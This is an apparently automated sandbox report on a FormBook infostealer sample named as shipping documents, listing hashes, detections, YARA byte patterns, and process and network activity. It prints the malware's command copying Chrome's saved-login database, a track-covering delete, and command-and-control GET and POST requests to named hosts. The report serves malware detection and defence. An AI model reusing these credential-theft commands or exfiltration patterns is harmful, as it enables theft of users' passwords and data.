
# Analysis Report 8976547shipping docs45890.exe

## Overview

### General Information

- Sample Name: 8976547shipping docs45890.exe
- MD5: 9c0050d6507ac9f040f7fa1aeb3bf1e7
- SHA1: eb4a60e4629cc227f115b5a87f8281feafc146f0
- SHA256: db4248d551714a38cb449dad526ce0f34c6fd84de269d15f579273623a4ed432

### Detection

- Detection: FormBook
- Score: 100 (range 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

Analysis system: w10x64

Process tree:

- 8976547shipping docs45890.exe (PID: 1496, cmdline: 'C:\Users\user\Desktop\8976547shipping docs45890.exe', MD5: 9C0050D6507AC9F040F7FA1AEB3BF1E7)
- AddInProcess32.exe (PID: 5912, cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, MD5: F2A47587431C466535F3C3D3427724BE)
- explorer.exe (PID: 2928, cmdline: (empty), MD5: E4A81EDDFF8B844D85C8B45354E4144E)
- NETSTAT.EXE (PID: 5788, cmdline: C:\Windows\SysWOW64\NETSTAT.EXE, MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
- cmd.exe (PID: 960, cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 3164, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5224, cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 4484, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- vnwl96s0uroti.exe (PID: 4240, cmdline: C:\Program Files (x86)\Ohfrhgbex\vnwl96s0uroti.exe, MD5: F2A47587431C466535F3C3D3427724BE)
- conhost.exe (PID: 4828, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

## Malware Configuration

No configs have been found
Yara matches on the initial sample (Source | Rule | Description | Author | Strings):

- Source: 8976547shipping docs45890.exe | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
- Source: 8976547shipping docs45890.exe | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x74850:\$sqlite3step: 68 34 1C 7B E1
  • 0x7497d:\$sqlite3step: 68 34 1C 7B E1
  • 0x7491c:\$sqlite3text: 68 38 2A 90 C5
  • 0x7541e:\$sqlite3text: 68 38 2A 90 C5
  • 0x7492f:\$sqlite3blob: 68 53 D8 7F 8C
  • 0x75434:\$sqlite3blob: 68 53 D8 7F 8C
- Source: 8976547shipping docs45890.exe | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x59805:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x59aab:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x6f5ae:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x6ee9d:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x7008d:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x6ff35:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x6d7c1:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x5cfcd:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x796d9:\$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x7ab23:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: .text | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
- Source: .text | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x74650:\$sqlite3step: 68 34 1C 7B E1
  • 0x7477d:\$sqlite3step: 68 34 1C 7B E1
  • 0x7471c:\$sqlite3text: 68 38 2A 90 C5
  • 0x7521e:\$sqlite3text: 68 38 2A 90 C5
  • 0x7472f:\$sqlite3blob: 68 53 D8 7F 8C
  • 0x75234:\$sqlite3blob: 68 53 D8 7F 8C
Yara matches on memory dumps (Source | Rule | Description | Author | Strings):

- Source: 00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
- Source: 00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18429:\$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:\$sqlite3step: 68 34 1C 7B E1
  • 0x18458:\$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:\$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
- Source: 00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:\$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
- Source: 00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18429:\$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:\$sqlite3step: 68 34 1C 7B E1
  • 0x18458:\$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:\$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
Yara matches on unpacked PEs (Source | Rule | Description | Author | Strings):

- Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18429:\$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:\$sqlite3step: 68 34 1C 7B E1
  • 0x18458:\$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:\$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
- Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:\$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 7.2.AddInProcess32.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x17629:\$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:\$sqlite3step: 68 34 1C 7B E1
  • 0x17658:\$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:\$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:\$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:\$sqlite3blob: 68 53 D8 7F 8C

## Sigma Overview

### System Summary:

Source: Process started; Author: Joe Security; Data:

- Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- CommandLine|base64offset|contains: (empty)
- Image: C:\Windows\SysWOW64\cmd.exe
- NewProcessName: C:\Windows\SysWOW64\cmd.exe
- OriginalFileName: C:\Windows\SysWOW64\cmd.exe
- ParentCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE
- ParentImage: C:\Windows\SysWOW64\NETSTAT.EXE
- ParentProcessId: 5788
- ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- ProcessId: 5224

Sigma detected: Suspicious Process Creation

Source: Process started; Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update); Data:

- Command: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
- CommandLine: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
- CommandLine|base64offset|contains: (empty)
- Image: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
- NewProcessName: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
- OriginalFileName: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
- ParentCommandLine: 'C:\Users\user\Desktop\8976547shipping docs45890.exe'
- ParentImage: C:\Users\user\Desktop\8976547shipping docs45890.exe
- ParentProcessId: 1496
- ProcessCommandLine: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
- ProcessId: 5912

## Signature Overview

### AV Detection:

Multi AV Scanner detection for submitted file

- Source: 8976547shipping docs45890.exe; Virustotal detection: 17%

Yara detected FormBook

- Source: Yara match, file sources of type SAMPLE:
  • 8976547shipping docs45890.exe
  • .text
- Source: Yara match, file sources of type MEMORY:
  • 00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmp
  • 00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmp
  • 00000000.00000003.933776765.0000000005AA9000.00000004.00000001.sdmp
  • 00000000.00000002.935322277.0000000000492000.00000002.00020000.sdmp
  • 00000000.00000003.933634572.0000000005AA5000.00000004.00000001.sdmp
  • 0000000A.00000002.1257946906.0000000000C30000.00000040.00000001.sdmp
  • 00000000.00000002.942193386.0000000005B21000.00000004.00000001.sdmp
  • 00000000.00000002.937457444.0000000002900000.00000004.00000001.sdmp
  • 00000007.00000002.1004742877.0000000001750000.00000040.00000001.sdmp
  • 00000000.00000003.933747174.0000000005AA8000.00000004.00000001.sdmp
  • 00000000.00000003.932794543.0000000005B15000.00000004.00000001.sdmp
  • 00000000.00000003.934367034.0000000005B21000.00000004.00000001.sdmp
  • 0000000A.00000002.1259601470.0000000001090000.00000004.00000001.sdmp
  • 0000000A.00000002.1259461875.0000000001060000.00000040.00000001.sdmp
  • 00000000.00000000.836537863.0000000000492000.00000002.00020000.sdmp
  • 00000000.00000002.937952216.0000000002989000.00000004.00000001.sdmp
  • 00000000.00000002.939997118.0000000003952000.00000004.00000001.sdmp
  • 00000000.00000002.940144120.00000000039BE000.00000004.00000001.sdmp
- Source: Yara match, file sources of type UNPACKEDPE:
  • 7.2.AddInProcess32.exe.400000.0.raw.unpack
  • 7.2.AddInProcess32.exe.400000.0.unpack
  • 0.0.8976547shipping docs45890.exe.490000.0.unpack
  • 0.2.8976547shipping docs45890.exe.490000.0.unpack

Machine Learning detection for sample

- Source: 8976547shipping docs45890.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file

Found inlined nop instructions (likely shell or obfuscated code)

- Source: C:\Users\user\Desktop\8976547shipping docs45890.exe; code function: 4x nop then pop edi at 0_2_00506097, 0_2_00506167 and 0_2_00506138
- Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; code function: 4x nop then pop ebx at 7_2_00407AC6; 4x nop then pop edi at 7_2_0040E55E and 7_2_00417D8F
- Source: C:\Windows\SysWOW64\NETSTAT.EXE; code function: 4x nop then pop ebx at 10_2_00C37AC6; 4x nop then pop edi at 10_2_00C47D8F, 10_2_00C3E55E and 10_2_00C46D3E

### Networking:

Uses netstat to query active network connections and open ports

- Source: unknown; process created: C:\Windows\SysWOW64\NETSTAT.EXE (command line: C:\Windows\SysWOW64\NETSTAT.EXE)

HTTP GET or POST without a user agent

- Source: global traffic; HTTP traffic detected:
  • GET /m1d/?S4=jnOL&mVkP=N6VmRRP7b8JeQkf5f2VBjAp6cI3WzG30MtPpJduncWM5SOUqIZbVVA6QVLWDL0OQjPyD HTTP/1.1 (Host: www.healing-with-touch.com; Connection: close; Data Raw: 00 00 00 00 00 00 00)
  • GET /m1d/?mVkP=aeApkG2QXy/NqgXwqypxNhYc1dg15pNH4qhXr6f69huGXQ1g51qT6a7czmC8py8kAo48&S4=jnOL HTTP/1.1 (Host: www.deeperootscbd.com; Connection: close; Data Raw: 00 00 00 00 00 00 00)

Uses a known web browser user agent for HTTP communication

- Source: global traffic; HTTP traffic detected:
  • POST /m1d/ HTTP/1.1 (Host: www.deeperootscbd.com; Connection: close; Content-Length: 410; Cache-Control: no-cache; Origin: http://www.deeperootscbd.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.deeperootscbd.com/m1d/; Accept-Language: en-US; Accept-Encoding: gzip, deflate); body: 410-byte form-encoded payload in the mVkP parameter (hex and ASCII dump not reproduced)
  • POST /m1d/ HTTP/1.1 (same headers as the previous request except Content-Length: 185462); body: 185462-byte form-encoded payload in the mVkP parameter (hex dump not reproduced)
  • the two GET requests to www.healing-with-touch.com and www.deeperootscbd.com listed under "HTTP GET or POST without a user agent" above
Performs DNS lookups

- Source: unknown; DNS traffic detected: queries for cdn.onenote.net

Posts data to webserver

- Source: unknown; HTTP traffic detected: POST /m1d/ HTTP/1.1 to Host www.deeperootscbd.com (Content-Length: 410; identical headers and body to the first POST listed under "Uses a known web browser user agent for HTTP communication")
Urls found in memory or binary data

- Source: explorer.exe, 00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp; strings found in binary or memory: http://fontfabrik.com, http://www.apache.org/licenses/LICENSE-2.0, http://www.carterandcone.coml, http://www.fonts.com, http://www.founder.com.cn/cn, http://www.founder.com.cn/cn/bThe, http://www.founder.com.cn/cn/cThe, http://www.goodfont.co.kr, http://www.jiyu-kobo.co.jp/, http://www.sajatypeworks.com, http://www.sakkal.com, http://www.sandoll.co.kr, http://www.tiro.com, http://www.typography.netD, http://www.zhongyicts.com.cn
- Source: explorer.exe, 00000008.00000000.948626276.0000000000CF0000.00000002.00000001.sdmp; string found in binary or memory: http://www.%s.comPA
- Source: NETSTAT.EXE, 0000000A.00000002.1263971889.0000000003AF9000.00000004.00000001.sdmp; strings found in binary or memory: http://www.deeperootscbd.com, http://www.deeperootscbd.com/m1d/

### E-Banking Fraud:

Yara detected FormBook

- Source: Yara match; the same SAMPLE, MEMORY and UNPACKEDPE file sources as listed under "Yara detected FormBook" in the AV Detection section above

### System Summary:

Detected FormBook malware